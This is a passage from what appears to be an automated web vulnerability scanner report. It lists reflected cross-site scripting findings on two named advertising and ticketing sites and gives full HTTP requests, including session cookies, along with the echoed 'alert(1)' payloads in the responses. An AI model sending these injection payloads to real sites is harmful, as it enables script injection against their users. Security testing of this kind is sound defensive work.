P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com/1361702731/x968a0e6"><script>alert(1)</script>9ef75515961/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.80. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dd27"><script>alert(1)</script>7e0afdb5b4d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample9dd27"><script>alert(1)</script>7e0afdb5b4d/wwww.themig.com/1936689153@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample9dd27"><script>alert(1)</script>7e0afdb5b4d/wwww.themig.com/831506250/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.81. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fdec"><script>alert(1)</script>c64d1920d72 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com5fdec"><script>alert(1)</script>c64d1920d72/1936689153@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com5fdec"><script>alert(1)</script>c64d1920d72/1161003160/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.82. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49b67"><script>alert(1)</script>5a1d01317d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com/1936689153@x9649b67"><script>alert(1)</script>5a1d01317d2?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com/765672396/x9649b67"><script>alert(1)</script>5a1d01317d2/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.83. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cbb"><script>alert(1)</script>fa065146d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSamplec5cbb"><script>alert(1)</script>fa065146d48/wwww.themig.com/1@x96?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSamplec5cbb"><script>alert(1)</script>fa065146d48/wwww.themig.com/1106225608/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.84. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f339e"><script>alert(1)</script>b7dc5d37df2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.comf339e"><script>alert(1)</script>b7dc5d37df2/1@x96?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.comf339e"><script>alert(1)</script>b7dc5d37df2/1189746631/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.85. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a29e6"><script>alert(1)</script>f274f4d0047 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com/1@x96a29e6"><script>alert(1)</script>f274f4d0047?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com/316215392/x96a29e6"><script>alert(1)</script>f274f4d0047/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.86. http://bing.fansnap.com/checkout/index/415814268 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fdd36(a)b5a28ad72b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /checkout/index/415814268fdd36(a)b5a28ad72b3?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:38:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 1065
ETag: "af793ec12b8ef7e3d482d9a63a70492e"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311100699; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:38:19 GMT
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlYWI2NmZiYzJkODZiNmU5YzJkZWMzM2M3ODA1MTYyMjY6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huAp0RNmQY6C29mZnNldGn%2BkJ06DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE1ODE0MjY4ZmRkMzYoYSliNWEyOGFkNzJiMz9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMiUzQmxwb3MlM0QwJTNCdCUzRGJ2JmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03BjoGRUY6D2JnX3JlZmVyZXIiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWw6EGJnX3Zpc2l0X2lkafxPShHbOhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2ODMwMjc1NTg1OhFiZ19zdHlsZV9pZHNJIgAGOwtGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQA8%3D--8b58f2aa8383c776e3b27cf6770cd031eb896f39; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11928
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 415814268fdd36(a)b5a28ad72b3, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=n
...[SNIP]...

4.87. http://bing.fansnap.com/checkout/index/415814268 [afm parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Issue detail

The value of the afm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44bca'%3balert(1)//30702b33e3b was submitted in the afm parameter. This input was echoed as 44bca';alert(1)//30702b33e3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca'%3balert(1)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "30d905cbedba4b014b953a02b8457d35"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AA5lqQBjoLb2Zmc2V0af6QnQ%3D%3D--dcb6ed181ab99f223d61120c2acc6c104c9dca9f; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12048
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '44bca';alert(1)//30702b33e3b' });
//]]>
...[SNIP]...

4.88. http://bing.fansnap.com/checkout/index/415814268 [ch parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Issue detail

The value of the ch request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edce3'%3balert(1)//af024862ed3 was submitted in the ch parameter. This input was echoed as edce3';alert(1)//af024862ed3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bingedce3'%3balert(1)//af024862ed3&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:31 GMT
Server: Apache/2.2.3 (CentOS)
